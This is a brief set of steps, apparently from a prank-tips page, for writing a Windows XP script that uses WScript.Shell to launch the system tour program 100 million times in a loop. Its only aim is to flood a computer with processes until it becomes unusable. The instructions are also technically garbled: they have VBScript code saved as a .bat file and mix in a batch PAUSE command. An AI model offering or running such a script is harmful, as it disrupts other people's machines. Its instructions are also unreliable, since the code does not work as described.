
setup1: win+R setup2: type -> Notepad setup3: Option Explicit Dim WSHShell Set WSHShell=Wscript.CreateObject(“Wscript.Shell”) Dim x For x = 1 to 100000000 WSHShell.Run “Tourstart.exe” Next PAUSE setup4: Save The Above Code in a .bat file It Only Works With Windows XP
